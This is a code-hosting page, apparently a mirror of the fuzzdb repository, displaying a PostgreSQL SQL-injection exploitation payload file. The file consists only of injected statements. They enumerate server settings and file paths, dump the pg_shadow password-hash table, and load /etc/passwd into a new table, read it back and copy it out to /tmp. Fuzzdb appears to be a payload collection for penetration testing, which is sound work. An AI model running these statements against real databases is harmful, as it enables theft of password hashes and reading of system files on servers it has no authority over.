/
osbornray
/
fuzzdb
Обзор
Документация
Войти
/
osbornray
/
fuzzdb
Код
Запросы
0
Задачи
Вики
Пакеты
0
Релизы
0
Аналитика
Безопасность
master
attack/sql-injection/exploit/postgres-enumeration.txt
19 строк
649 B
Adam Muntner
doc relocation and renaming update
12 сен 2015, 02:39
12 сен 2015, 02:39
a58bdb6
Код
Авторство
О чём код?
select version(); select current_database(); select current_user; select session_user; select current_setting('log_connections'); select current_setting('log_statement'); select current_setting('port'); select current_setting('password_encryption'); select current_setting('krb_server_keyfile'); select current_setting('virtual_host'); select current_setting('port'); select current_setting('config_file'); select current_setting('hba_file'); select current_setting('data_directory'); select * from pg_shadow; select * from pg_group; create table myfile (input TEXT); copy myfile from '/etc/passwd'; select * from myfile;copy myfile to /tmp/test;